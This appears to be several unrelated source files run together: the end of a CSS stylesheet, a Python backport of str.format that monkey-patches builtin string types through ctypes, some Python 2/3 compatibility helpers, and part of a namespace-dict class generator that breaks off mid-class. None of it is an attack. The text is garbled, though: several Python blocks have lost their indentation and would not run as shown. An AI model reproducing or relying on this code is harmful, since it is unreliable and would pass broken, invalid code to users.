    -moz-box-shadow: inset 0 4px 4px rgba(0, 0, 0, 0.03);
    -webkit-box-shadow: inset 0 4px 4px rgba(0, 0, 0, 0.03);
    box-shadow: inset 0 4px 4px rgba(0, 0, 0, 0.03);
    -moz-border-radius: 4px;
    -webkit-border-radius: 4px;
    border-radius: 4px;
}
/* Let WebKit render its native search field. */
input[type="search"] {
    -webkit-appearance: searchfield;
    border: none;
}
input[type="radio"], input[type="checkbox"], input[type="submit"], input[type="reset"], input[type="button"], input[type="file"], select {
    font-size: 1em;
}
select {
    line-height: 16px;
}
h3, h4, h5, h6 {
    margin-top: 0;
    padding-top: 0;
    margin-bottom: 3px;
}
/* Horizontal rule drawn as a single 1px bottom border. */
hr {
    padding: 0;
    margin: 5px 0;
    height: 1px;
    border: none;
    border-bottom: 1px solid #ddd;
}
code, pre, textarea {
    font-family: Monaco, "Courier New", monospace;
}
pre, textarea {
    font-size: 11px;
}
a img {
    border: none;
}
fieldset {
    margin: 0;
    border: none;
    padding: 0;
}
div {
    margin: 0;
    padding: 0;
}
p {
    margin: 0;
    padding: 0;
}
table {
    padding: 0;
    margin: 0;
}
th {
    vertical-align: top;
    text-align: left;
}
/* Data tables: collapsed borders, shaded header cells. */
table {
    margin: 9px 0;
    border-collapse: collapse;
}
table th,
table td {
    border: 1px solid #ddd;
    padding: 3px 6px;
}
table th {
    background: #f7f7f7;
    font-weight: bold;
}
blockquote, .xx ol, .xx ul {
    list-style: none outside none;
    margin: 0;
    padding: 0 0 0 36px;
}
p {
    margin: 9px 0;
    line-height: 18px;
}
/* Center the content column at 70% of the viewport width. */
body {
    margin: auto;
    width: 70%;
}
/* Bold titles for reStructuredText admonition blocks.
   (Extraction residue that trailed the closing brace and made the rule
   invalid CSS has been removed.) */
.admonition-title {
    font-weight: bold;
}
import re
__all__ = ['FormattableString', 'init']
if not hasattr(str, 'partition'):  # Python 2.4 fallback
    def partition(s, sep):
        """Emulate str.partition: (head, sep, tail), or (s, '', '') when
        *sep* does not occur in *s*."""
        try:
            head, tail = s.split(sep, 1)
        except ValueError:
            return s, '', ''
        return head, sep, tail
else:
    def partition(s, sep):
        """Thin wrapper around the native str.partition (2.5+)."""
        return s.partition(sep)
# Top-level scanner for a format string: matches a literal '%' (which
# must be doubled for the final %-substitution), runs of escaped braces
# '{{' / '}}', and a complete replacement field '{...}' allowing at most
# one level of nested braces inside.
_format_str_re = re.compile(
    r'(%)'                           # '%'
    r'|((?<!{)(?:{{)+'               # '{{'
    r'|(?:}})+(?!})'                 # '}}'
    r'|{(?:[^{](?:[^{}]+|{[^{}]*})*)?})'  # replacement field
)
# Matches one nested replacement field inside a format spec,
# e.g. '{width}' within '{0:{width}}'.
_format_sub_re = re.compile(r'({[^{}]*})')  # nested replacement field
# Parses a PEP 3101 format specification:
# [[fill]align][sign][#][width][,][.precision][type]
_format_spec_re = re.compile(
    r'((?:[^{}]?[<>=^])?)'      # alignment
    r'([-+ ]?)'                 # sign
    r'(#?)' r'(\d*)' r'(,?)'    # base prefix, minimal width, thousands sep
    r'((?:\.\d+)?)'             # precision
    r'(.?)$'                    # type
)
# Splits a field name into attribute ('.name') and item ('[key]') parts;
# group 3 captures any invalid text trailing a ']'.
_field_part_re = re.compile(
    r'(?:(\[)|\.|^)'            # start or '.' or '['
    r'((?(1)[^]]*|[^.[]*))'     # part
    r'(?(1)(?:\]|$)([^.[]+)?)'  # ']' and invalid tail
)
# _format_str_sub(repl, s): substitution wrapper around
# _format_str_re.sub that preserves the str/unicode type of *s*.
if hasattr(re, '__version__'):
    _format_str_sub = _format_str_re.sub
else:
    # Python 2.4's re.sub fails to preserve the Unicode type, so coerce
    # the result back to unicode when the input was unicode.
    def _format_str_sub(repl, s):
        if isinstance(s, unicode):
            return unicode(_format_str_re.sub(repl, s))
        return _format_str_re.sub(repl, s)
if hasattr(int, '__index__'):
def _is_integer(value):
return hasattr(value, '__index__')
else: # Python 2.4
def _is_integer(value):
return isinstance(value, (int, long))
try:
unicode
def _chr(n):
return chr(n % 256)
except NameError: # Python 3
unicode = str
_chr = chr
def _strformat(value, format_spec=""):
    """Internal string formatter.

    Implements the PEP 3101 Format Specification Mini-Language
    (``[[fill]align][sign][#][0][width][,][.precision][type]``) for a
    single value, delegating the basic conversion to the classic
    %-operator.  Raises ValueError for specs invalid for the value's type.
    """
    m = _format_spec_re.match(str(format_spec))
    if not m:
        raise ValueError('Invalid conversion specification')
    align, sign, prefix, width, comma, precision, conversion = m.groups()
    # Numbers are detected structurally (presence of __float__), not by
    # isinstance, so float-like user types format as numeric.
    is_numeric = hasattr(value, '__float__')
    is_integer = is_numeric and _is_integer(value)
    if prefix and not is_integer:
        raise ValueError('Alternate form (#) not allowed in %s format '
                         'specifier' % (is_numeric and 'float' or 'string'))
    if is_numeric and conversion == 'n':
        # Default to 'd' for ints and 'g' for floats
        conversion = is_integer and 'd' or 'g'
    elif sign:
        if not is_numeric:
            raise ValueError("Sign not allowed in string format specifier")
        if conversion == 'c':
            raise ValueError("Sign not allowed with integer "
                             "format specifier 'c'")
    if comma:
        # TODO: thousand separator
        pass
    try:
        # Reject combinations the %-operator would mishandle instead of
        # rejecting: 's' on numbers, integer codes on non-integers.
        if ((is_numeric and conversion == 's') or
            (not is_integer and conversion in set('cdoxX'))):
            raise ValueError
        if conversion == 'c':
            conversion = 's'
            value = _chr(value)
        rv = ('%' + prefix + precision + (conversion or 's')) % (value,)
    except ValueError:
        raise ValueError("Unknown format code %r for object of type %r" %
                         (conversion, value.__class__.__name__))
    # An empty sign is a substring of '-', so only ' ' or '+' get here;
    # %-formatting already emits the '-' for negatives.
    if sign not in '-' and value >= 0:
        # sign in (' ', '+')
        rv = sign + rv
    if width:
        zero = (width[0] == '0')
        width = int(width)
    else:
        zero = False
        width = 0
    # Fastpath when alignment is not required
    if width <= len(rv):
        if not is_numeric and (align == '=' or (zero and not align)):
            raise ValueError("'=' alignment not allowed in string format "
                             "specifier")
        return rv
    fill, align = align[:-1], align[-1:]
    if not fill:
        fill = zero and '0' or ' '
    if align == '^':
        padding = width - len(rv)
        # tweak the formatting if the padding is odd
        if padding % 2:
            rv += fill
        rv = rv.center(width, fill)
    elif align == '=' or (zero and not align):
        # Pad between the sign and the digits ('=' or leading-zero width).
        if not is_numeric:
            raise ValueError("'=' alignment not allowed in string format "
                             "specifier")
        if value < 0 or sign not in '-':
            rv = rv[0] + rv[1:].rjust(width - 1, fill)
        else:
            rv = rv.rjust(width, fill)
    elif align in ('>', '=') or (is_numeric and not align):
        # numeric value right aligned by default
        rv = rv.rjust(width, fill)
    else:
        rv = rv.ljust(width, fill)
    return rv
def _format_field(value, parts, conv, spec, want_bytes=False):
"""Format a replacement field."""
for k, part, _ in parts:
if k:
if part.isdigit():
value = value[int(part)]
else:
value = value[part]
else:
value = getattr(value, part)
if conv:
value = ((conv == 'r') and '%r' or '%s') % (value,)
if hasattr(value, '__format__'):
value = value.__format__(spec)
elif hasattr(value, 'strftime') and spec:
value = value.strftime(str(spec))
else:
value = _strformat(value, spec)
if want_bytes and isinstance(value, unicode):
return str(value)
return value
class FormattableString(object):
    """Pre-parsed format string with a str.format()-compatible format().

    The format string is scanned once at construction and compiled into a
    classic ``%(key)s`` template (``self._string``); format() then only
    has to compute each replacement value and apply a single ``%``
    substitution.

    >>> FormattableString(u'{a:5}').format(a=42)
    ...     # Same as u'{a:5}'.format(a=42)
    u'   42'
    """

    # _index:  auto-numbering counter, or None once a manual '{0}' field
    #          has been seen (the two modes must not be mixed).
    # _kwords: field name -> [(name_parts, conversion, spec), ...]
    # _nested: same, for fields whose spec contains nested fields '{0:{w}}'
    __slots__ = '_index', '_kwords', '_nested', '_string', 'format_string'

    def __init__(self, format_string):
        self._index = 0
        self._kwords = {}
        self._nested = {}
        self.format_string = format_string
        # _prepare() runs once per match and fills the tables above.
        self._string = _format_str_sub(self._prepare, format_string)

    def __eq__(self, other):
        if isinstance(other, FormattableString):
            return self.format_string == other.format_string
        # Compare equal with the original string.
        return self.format_string == other

    def _prepare(self, match):
        # Called for each replacement field.
        part = match.group(0)
        if part == '%':
            # Escape literal '%' for the final %-substitution.
            return '%%'
        if part[0] == part[-1]:
            # '{{' or '}}'
            assert part == part[0] * len(part)
            return part[:len(part) // 2]
        repl = part[1:-1]
        field, _, format_spec = partition(repl, ':')
        literal, sep, conversion = partition(field, '!')
        if sep and not conversion:
            raise ValueError("end of format while looking for "
                             "conversion specifier")
        if len(conversion) > 1:
            raise ValueError("expected ':' after format specifier")
        # Empty string is a substring of 'rsa', so "no conversion" passes.
        if conversion not in 'rsa':
            raise ValueError("Unknown conversion specifier %s" %
                             str(conversion))
        name_parts = _field_part_re.findall(literal)
        if literal[:1] in '.[':
            # Auto-numbering (field name omitted, e.g. '{}' or '{.attr}')
            if self._index is None:
                raise ValueError("cannot switch from manual field "
                                 "specification to automatic field numbering")
            name = str(self._index)
            self._index += 1
            if not literal:
                del name_parts[0]
        else:
            name = name_parts.pop(0)[1]
            if name.isdigit() and self._index is not None:
                # Manual specification
                if self._index:
                    raise ValueError("cannot switch from automatic field "
                                     "numbering to manual field specification")
                self._index = None
        empty_attribute = False
        for k, v, tail in name_parts:
            if not v:
                empty_attribute = True
            if tail:
                raise ValueError("Only '.' or '[' may follow ']' "
                                 "in format field specifier")
        # NOTE: k deliberately leaks from the loop -- it is the kind
        # marker of the *last* part.
        if name_parts and k == '[' and not literal[-1] == ']':
            raise ValueError("Missing ']' in format string")
        if empty_attribute:
            raise ValueError("Empty attribute in format string")
        if '{' in format_spec:
            # The spec itself contains replacement fields: recurse, and
            # defer this field to the second pass in format().
            format_spec = _format_sub_re.sub(self._prepare, format_spec)
            rv = (name_parts, conversion, format_spec)
            self._nested.setdefault(name, []).append(rv)
        else:
            rv = (name_parts, conversion, format_spec)
            self._kwords.setdefault(name, []).append(rv)
        # id(rv) is a unique, %-safe key for this field occurrence.
        return r'%%(%s)s' % id(rv)

    def format(self, *args, **kwargs):
        """Same as str.format() and unicode.format() in Python 2.6+."""
        if args:
            # Positional arguments are exposed under their string index.
            kwargs.update(dict((str(i), value)
                               for (i, value) in enumerate(args)))
        # Encode arguments to ASCII, if format string is bytes
        want_bytes = isinstance(self._string, str)
        params = {}
        for name, items in self._kwords.items():
            value = kwargs[name]
            for item in items:
                parts, conv, spec = item
                params[str(id(item))] = _format_field(value, parts, conv, spec,
                                                      want_bytes)
        for name, items in self._nested.items():
            value = kwargs[name]
            for item in items:
                parts, conv, spec = item
                # Resolve the nested fields inside the spec first.
                spec = spec % params
                params[str(id(item))] = _format_field(value, parts, conv, spec,
                                                      want_bytes)
        return self._string % params
# the code below is used to monkey patch builtins
def _patch_builtin_types():
    """Monkey-patch the builtin string types with a format() method.

    Uses ctypes to reach through the read-only dict proxy guarding
    str.__dict__ / unicode.__dict__.  CPython-specific and inherently
    fragile; only invoked by init() when str lacks a native format().
    """
    # originally from https://gist.github.com/295200 (Armin R.)
    import ctypes
    import sys

    # figure out size of _Py_ssize_t (64-bit builds export this symbol)
    if hasattr(ctypes.pythonapi, 'Py_InitModule4_64'):
        _Py_ssize_t = ctypes.c_int64
    else:
        _Py_ssize_t = ctypes.c_int

    # Minimal mirror of CPython's PyObject header.
    class _PyObject(ctypes.Structure):
        pass
    _PyObject._fields_ = [
        ('ob_refcnt', _Py_ssize_t),
        ('ob_type', ctypes.POINTER(_PyObject)),
    ]

    # python with trace: objects carry two extra link pointers up front
    if hasattr(sys, 'getobjects'):
        _PyObject._fields_[0:0] = [
            ('_ob_next', ctypes.POINTER(_PyObject)),
            ('_ob_prev', ctypes.POINTER(_PyObject)),
        ]

    class _DictProxy(_PyObject):
        _fields_ = [('dict', ctypes.POINTER(_PyObject))]

    def get_class_dict(cls):
        # Return the real, writable dict hidden behind cls.__dict__.
        d = getattr(cls, '__dict__', None)
        if hasattr(d, 'pop'):
            return d
        if d is None:
            raise TypeError('given class does not have a dictionary')
        setitem = ctypes.pythonapi.PyDict_SetItem
        ns = {}
        # Reveal dict behind DictProxy: store the proxied dict object
        # into ns via the C API, then pull it back out.
        dp = _DictProxy.from_address(id(d))
        setitem(ctypes.py_object(ns), ctypes.py_object(None), dp.dict)
        return ns[None]

    def format(self, *args, **kwargs):
        """S.format(*args, **kwargs) -> string

        Return a formatted version of S, using substitutions from args and kwargs.
        The substitutions are identified by braces ('{' and '}').
        """
        return FormattableString(self).format(*args, **kwargs)

    # This does the actual monkey patch on str and unicode
    for cls in str, unicode:
        get_class_dict(cls)['format'] = format
def init(force=False):
    """Install the format() work-alike on the builtin string types.

    No-op when str already provides a native format() method, unless
    *force* is true.
    """
    if not force and hasattr(str, 'format'):
        return
    _patch_builtin_types()
def selftest():
    """Sanity checks for FormattableString and the patched builtins.

    Raises AssertionError on failure; prints a success message otherwise.
    """
    import datetime
    F = FormattableString
    d = datetime.date(2010, 9, 7)
    u = unicode

    # Initialize: force the ctypes monkey patch even where str.format exists.
    init(True)

    # '{0:8.5s}' truncates to 5 chars and left-justifies in width 8, so
    # the expected value is 'hello' followed by three spaces.  (The
    # expected literals had lost their trailing padding, which made
    # these asserts fail.)
    assert F(u("{0:{width}.{precision}s}")).format('hello world',
             width=8, precision=5) == u('hello   ')
    assert F(u("The year is {0.year}")).format(d) == u("The year is 2010")
    assert F(u("Tested on {0:%Y-%m-%d}")).format(d) == u("Tested on 2010-09-07")

    # Same checks through the (patched) unicode and str methods.
    assert u("{0:{width}.{precision}s}").format('hello world',
             width=8, precision=5) == u('hello   ')
    assert u("The year is {0.year}").format(d) == u("The year is 2010")
    assert u("Tested on {0:%Y-%m-%d}").format(d) == u("Tested on 2010-09-07")

    assert "{0:{width}.{precision}s}".format('hello world',
           width=8, precision=5) == 'hello   '
    assert "The year is {0.year}".format(d) == "The year is 2010"
    assert "Tested on {0:%Y-%m-%d}".format(d) == "Tested on 2010-09-07"

    print('Test successful')
# Script entry point: run the module self-test.  (Trailing extraction
# residue after the call, which was a syntax error, has been removed.)
if __name__ == '__main__':
    selftest()
# --------------------------------------------------
# |||:sec:||| COMPATIBILITY
# --------------------------------------------------
import sys
# (progn (forward-line 1) (snip-insert-mode "py.b.printf" t) (insert "\n"))
# printf(): portable print-as-a-function.
#  - Python 3.x: printf is the builtin print (fetched via eval, since a
#    bare ``print`` expression is a SyntaxError on 2.x).
#  - Python 2.6/2.7: print_function imported inside exec'd code, because
#    a __future__ import cannot appear mid-module.
#  - Python 2.4/2.5: minimal reimplementation honoring file/sep/end.
# adapted from http://www.daniweb.com/software-development/python/code/217214
try:
    printf = eval("print") # python 3.0 case
except SyntaxError:
    printf_dict = dict()
    try:
        exec("from __future__ import print_function\nprintf=print", printf_dict)
        printf = printf_dict["printf"] # 2.6 case
    except SyntaxError:
        def printf(*args, **kwd): # 2.4, 2.5, define our own Print function
            fout = kwd.get("file", sys.stdout)
            w = fout.write
            if args:
                w(str(args[0]))
                sep = kwd.get("sep", " ")
                for a in args[1:]:
                    w(sep)
                    w(str(a))
            w(kwd.get("end", "\n"))
    del printf_dict
# (progn (forward-line 1) (snip-insert-mode "py.b.sformat" t) (insert "\n"))
# sformat(): str.format as a plain function.  Uses the native format()
# method when available; otherwise falls back to the ``stringformat``
# backport (PyPI package, or the bundled stringformat_local module).
try:
    ('{0}').format(0)
    def sformat (fmtspec, *args, **kwargs):
        return fmtspec.format(*args, **kwargs)
except AttributeError:
    try:
        import stringformat
    except ImportError:
        try:
            import stringformat_local as stringformat
        except ImportError:
            printf('error: (nd) stringformat missing. Try `easy_install stringformat`.', file=sys.stderr)
    def sformat (fmtspec, *args, **kwargs):
        return stringformat.FormattableString(fmtspec).format(
            *args, **kwargs)
# (progn (forward-line 1) (snip-insert-mode "py.f.isstring" t) (insert "\n"))
# isstring(): duck-type test for "any string".  The Python 2 variant
# checks against basestring; it is wrapped in exec so the 2to3 converter
# does not rewrite it.
# hide from 2to3
exec('''
def isstring(obj):
    return isinstance(obj, basestring)
''')
try:
    isstring("")
except NameError:
    # Python 3: basestring is gone; accept str and bytes.
    def isstring(obj):
        return isinstance(obj, str) or isinstance(obj, bytes)
# (progn (forward-line 1) (snip-insert-mode "py.b.dict_items" t) (insert "\n"))
# Portable lazy dict iteration helpers.
try:
    getattr(dict(), 'iteritems')
except AttributeError:
    # Python 3: items()/keys()/values() already return lazy views.
    ditems = lambda d: getattr(d, 'items')()
    dkeys = lambda d: getattr(d, 'keys')()
    dvalues = lambda d: getattr(d, 'values')()
else:
    # Python 2: prefer the iter* variants over list-building methods.
    ditems = lambda d: getattr(d, 'iteritems')()
    dkeys = lambda d: getattr(d, 'iterkeys')()
    dvalues = lambda d: getattr(d, 'itervalues')()
import os
import re
# --------------------------------------------------
# |||:sec:||| CONFIGURATION
# --------------------------------------------------
# Public names exported by ``from namespace_dict import *``.
__all__ = [
    'NameSpace',
    'NameSpaceDict',
    'NameSpaceMeta',
    'NameSpaceNS',
]
# Debug-output settings; each can be overridden by pre-defining the name
# in globals() before this module body runs.  NOTE(review): because of
# the ``or`` fallback, falsy overrides (0, '') are ignored and the
# default is used -- presumably intentional, confirm before relying on it.
dbg_comm = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dbg_twid = ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9))
dbg_fwid = ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (20))
# (progn (forward-line 1) (snip-insert-mode "py.b.dbg.setup" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.strings" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.strclean" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.issequence" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.logging" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.ordereddict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.pyramid.activate" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.project.libdir" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.alchemy" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.ws" t) (insert "\n"))
# @:adhoc_run_time:@
#import adhoc # @:adhoc:@
# (progn (forward-line 1) (snip-insert-mode "py.b.posix" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.os.system.sh" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.prog.path" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.line.loop" t) (insert "\n"))
# --------------------------------------------------
# |||:sec:||| CLASSES
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.c.placeholder.template" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.key.hash.ordered.dict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.progress" t) (insert "\n"))
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.class" t) (backward-symbol-tag 2 "fillme" "::"))
# --------------------------------------------------
# |||:sec:||| NAMESPACE CLOSURES
# --------------------------------------------------
import weakref
# @:adhoc_template:@ -
class NameSpaceNS(object): # ||:cls:||
# @:adhoc_template:@
'''Class based namespace for dict based namespace.
The dictonary interface of the namespace dict can be exposed on 3
levels:
1. expose_dict=0: No dict interface
2. expose_dict=1: dict interface for namespace object
3. expose_dict=2: dict interface for namespace class object
'''
# @:adhoc_template:@ -
@staticmethod
def no_attrib_msg(cls, name): # |:fnc:|
msg = ("'", cls.__name__, "'",
" object has no attribute '", name, "'")
return ''.join(msg)
@staticmethod
def no_set_attrib_msg(cls, name): # |:fnc:|
return "can't set attribute"
@staticmethod
def no_del_attrib_msg(cls, name): # |:fnc:|
return "can't delete attribute"
    @staticmethod
    def property_closure(obj, expose_dict): # ||:clo:||
        # @:adhoc_template:@
        '''Namespace class object property closure.'''
        # @:adhoc_template:@ -
        # Builds the special methods for the per-instance ``_property_``
        # companion object and returns them as a list.  property_()
        # unpacks this list positionally, so the append order below is
        # part of the contract.
        # Weak reference: avoids a reference cycle between the namespace
        # object and the closure cells of its property object.
        prop = weakref.ref(obj)
        cls = obj.__class__
        result = []
        # Installed as __getattribute__ on the property class (see
        # property_): reaches the *real* attributes of the namespace
        # instance via the superclass protocol, bypassing the namespace
        # dict emulation.
        def __getattr__(obj, name): # |:clm:|
            return super(cls, prop()).__getattribute__(name)
        result.append(__getattr__)
        def __setattr__(obj, name, value): # |:clm:|
            super(cls, prop()).__setattr__(name, value)
        result.append(__setattr__)
        def __delattr__(obj, name): # |:clm:|
            super(cls, prop()).__delattr__(name)
        result.append(__delattr__)
        # Full dict interface requested: also forward the dictionary
        # protocol methods to the namespace object itself.
        if expose_dict > 1:
            def __cmp__(self, *args, **kwargs):
                return prop().__cmp__(*args, **kwargs)
            result.append(__cmp__)
            def __contains__(self, *args, **kwargs):
                return prop().__contains__(*args, **kwargs)
            result.append(__contains__)
            def __delitem__(self, *args, **kwargs):
                return prop().__delitem__(*args, **kwargs)
            result.append(__delitem__)
            def __eq__(self, *args, **kwargs):
                return prop().__eq__(*args, **kwargs)
            result.append(__eq__)
            def __ge__(self, *args, **kwargs):
                return prop().__ge__(*args, **kwargs)
            result.append(__ge__)
            def __getitem__(self, *args, **kwargs):
                return prop().__getitem__(*args, **kwargs)
            result.append(__getitem__)
            def __gt__(self, *args, **kwargs):
                return prop().__gt__(*args, **kwargs)
            result.append(__gt__)
            def __hash__(self, *args, **kwargs):
                return prop().__hash__(*args, **kwargs)
            result.append(__hash__)
            def __iter__(self, *args, **kwargs):
                return prop().__iter__(*args, **kwargs)
            result.append(__iter__)
            def __le__(self, *args, **kwargs):
                return prop().__le__(*args, **kwargs)
            result.append(__le__)
            def __len__(self, *args, **kwargs):
                return prop().__len__(*args, **kwargs)
            result.append(__len__)
            def __lt__(self, *args, **kwargs):
                return prop().__lt__(*args, **kwargs)
            result.append(__lt__)
            def __ne__(self, *args, **kwargs):
                return prop().__ne__(*args, **kwargs)
            result.append(__ne__)
            def __setitem__(self, *args, **kwargs):
                return prop().__setitem__(*args, **kwargs)
            result.append(__setitem__)
            def __sizeof__(self, *args, **kwargs):
                return prop().__sizeof__(*args, **kwargs)
            result.append(__sizeof__)
        return result
    @classmethod
    def property_(nsc, obj, expose_dict): # ||:clg:||
        # @:adhoc_template:@
        '''Property instance generator.'''
        # @:adhoc_template:@ -
        # Creates the ``_property_`` companion object for namespace
        # instance `obj`.  The closures produced by property_closure()
        # are unpacked positionally; note that the first closure (named
        # __getattr__ there) is installed here as __getattribute__.
        class property__(object): # |:ccl:|
            if expose_dict > 1:
                __getattribute__, __setattr__, __delattr__, \
                __cmp__, __contains__, __delitem__, __eq__, \
                __ge__, __getitem__, __gt__, __hash__, __iter__, \
                __le__, __len__, __lt__, __ne__, __setitem__, __sizeof__, \
                = (nsc.property_closure(obj, expose_dict))
            else:
                __getattribute__, __setattr__, __delattr__, \
                = (nsc.property_closure(obj, expose_dict))
        return property__()
ignore_dict_attrs = [
'__getattribute__',
'__init__',
'__new__',
'__repr__',
]
# @:adhoc_template:@
known_dict_attrs = []
# @:adhoc_template:@ -
    @classmethod
    def namespace_closure(nsc, expose_dict): # ||:clo:||
        # @:adhoc_template:@
        '''Namespace closure.'''
        # @:adhoc_template:@ -
        # `ns` is the namespace dict (exposed to callers as __dict__);
        # `props` holds the special properties.  NOTE(review): both are
        # created once per *generated class*, so they are shared by all
        # instances of that class.
        ns = {}
        props = {
            '__dict__': ns
            # __class__
            # _property_
        }
        def __property_init__(obj, cls): # |:clm:|
            # @:adhoc_template:@
            '''Setup special __class__ and _property_ properties for object.'''
            # @:adhoc_template:@ -
            # cls = object.__getattribute__(obj, '__class__')
            props['__class__'] = cls
            props['_property_'] = nsc.property_(obj, expose_dict)
            return cls
        def __getattr__(obj, name): # |:clm:|
            # @:adhoc_template:@
            '''Get attribute from namespace dict.
            Special properties `__dict__`, `__class__`, `_property_` come
            from property dict.
            '''
            # @:adhoc_template:@ -
            try:
                return props[name]
            except KeyError:
                pass
            # allow dictionary access
            if expose_dict:
                if (name not in nsc.ignore_dict_attrs
                    and name in ns.__class__.__dict__):
                    # @:adhoc_template:@
                    # if name not in nsc.known_dict_attrs: # |:debug:| show used attributes
                    #     nsc.known_dict_attrs.append(name)
                    # @:adhoc_template:@ -
                    return getattr(ns, name)
            try:
                return ns[name]
            except KeyError:
                raise AttributeError(
                    nsc.no_attrib_msg(props['__class__'], name))
        def __setattr__(obj, name, value): # |:clm:|
            # @:adhoc_template:@
            '''Set attribute in namespace dict.
            If special property __dict__ is set, the namespace dict is
            cleared and updated from value.
            Special properties `__class__` and `_property_` cannot be set.
            '''
            # @:adhoc_template:@ -
            if name in props:
                if name == '__dict__':
                    # keep the identity of `ns` intact: clear + update
                    # instead of rebinding
                    ns.clear()
                    ns.update(value)
                else:
                    raise AttributeError(
                        nsc.no_set_attrib_msg(props['__class__'], name))
            else:
                ns[name] = value
        def __delattr__(obj, name): # |:clm:|
            # @:adhoc_template:@
            '''Delete attribute in namespace dict.
            Special properties `__dict__`, `__class__`, `_property_`
            cannot be deleted.
            '''
            # @:adhoc_template:@ -
            if name in props:
                raise AttributeError(
                    nsc.no_del_attrib_msg(props['__class__'], name))
            try:
                del(ns[name])
            except KeyError:
                raise AttributeError(
                    nsc.no_attrib_msg(props['__class__'], name))
        # Returned in the order expected by namespace(): installed as
        # __getattribute__, __setattr__, __delattr__, _ns_prop_init_.
        return __getattr__, __setattr__, __delattr__, __property_init__
    @classmethod
    def namespace(nsc, for_=object, expose_dict=0): # ||:clg:||
        # @:adhoc_template:@
        '''Namespace (meta-) class generator.'''
        # @:adhoc_template:@ -
        # Generates a class deriving from `for_` whose attribute protocol
        # is redirected into the closure dict from namespace_closure().
        # expose_dict: truthy adds the dict interface on the namespace;
        # > 1 additionally exposes the dict protocol on `_property_`.
        class namespace_(for_): # |:ccl:|
            __getattribute__, __setattr__, __delattr__, _ns_prop_init_ =(
                nsc.namespace_closure(expose_dict))
            # exposed dict interface
            if expose_dict:
                def __contains__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__contains__')(*args, **kwargs)
                def __delitem__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__delitem__')(*args, **kwargs)
                def __eq__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__eq__')(*args, **kwargs)
                def __ge__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__ge__')(*args, **kwargs)
                def __getitem__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__getitem__')(*args, **kwargs)
                def __gt__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__gt__')(*args, **kwargs)
                def __hash__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__hash__')(*args, **kwargs)
                def __iter__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__iter__')(*args, **kwargs)
                def __le__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__le__')(*args, **kwargs)
                def __len__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__len__')(*args, **kwargs)
                def __lt__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__lt__')(*args, **kwargs)
                def __ne__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__ne__')(*args, **kwargs)
                def __setitem__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__setitem__')(*args, **kwargs)
                def __sizeof__(self, *args, **kwargs):
                    return getattr(self.__dict__, '__sizeof__')(*args, **kwargs)
                def clear(self, *args, **kwargs):
                    return getattr(self.__dict__, 'clear')(*args, **kwargs)
                def copy(self, *args, **kwargs):
                    return getattr(self.__dict__, 'copy')(*args, **kwargs)
                def fromkeys(self, *args, **kwargs):
                    return getattr(self.__dict__, 'fromkeys')(*args, **kwargs)
                def get(self, *args, **kwargs):
                    return getattr(self.__dict__, 'get')(*args, **kwargs)
                def items(self, *args, **kwargs):
                    return getattr(self.__dict__, 'items')(*args, **kwargs)
                def keys(self, *args, **kwargs):
                    return getattr(self.__dict__, 'keys')(*args, **kwargs)
                def pop(self, *args, **kwargs):
                    return getattr(self.__dict__, 'pop')(*args, **kwargs)
                def popitem(self, *args, **kwargs):
                    return getattr(self.__dict__, 'popitem')(*args, **kwargs)
                def setdefault(self, *args, **kwargs):
                    return getattr(self.__dict__, 'setdefault')(*args, **kwargs)
                def update(self, *args, **kwargs):
                    return getattr(self.__dict__, 'update')(*args, **kwargs)
                def values(self, *args, **kwargs):
                    return getattr(self.__dict__, 'values')(*args, **kwargs)
                # Python 2 detected by the presence of dict.iteritems;
                # only then are the py2-specific dict methods exposed.
                _ns_for_py2_ = hasattr(dict.__dict__, 'iteritems')
                if _ns_for_py2_:
                    def __cmp__(self, *args, **kwargs):
                        return getattr(self.__dict__, '__cmp__')(*args, **kwargs)
                    def has_key(self, *args, **kwargs):
                        return getattr(self.__dict__, 'has_key')(*args, **kwargs)
                    def iteritems(self, *args, **kwargs):
                        return getattr(self.__dict__, 'iteritems')(*args, **kwargs)
                    def iterkeys(self, *args, **kwargs):
                        return getattr(self.__dict__, 'iterkeys')(*args, **kwargs)
                    def itervalues(self, *args, **kwargs):
                        return getattr(self.__dict__, 'itervalues')(*args, **kwargs)
                    def viewitems(self, *args, **kwargs):
                        return getattr(self.__dict__, 'viewitems')(*args, **kwargs)
                    def viewkeys(self, *args, **kwargs):
                        return getattr(self.__dict__, 'viewkeys')(*args, **kwargs)
                    def viewvalues(self, *args, **kwargs):
                        return getattr(self.__dict__, 'viewvalues')(*args, **kwargs)
            def __init__(self, *args, **kwargs): # |:ccm:|
                # install __class__/_property_ before delegating to the
                # base class constructor
                for_.__getattribute__(self, '_ns_prop_init_')(namespace_)
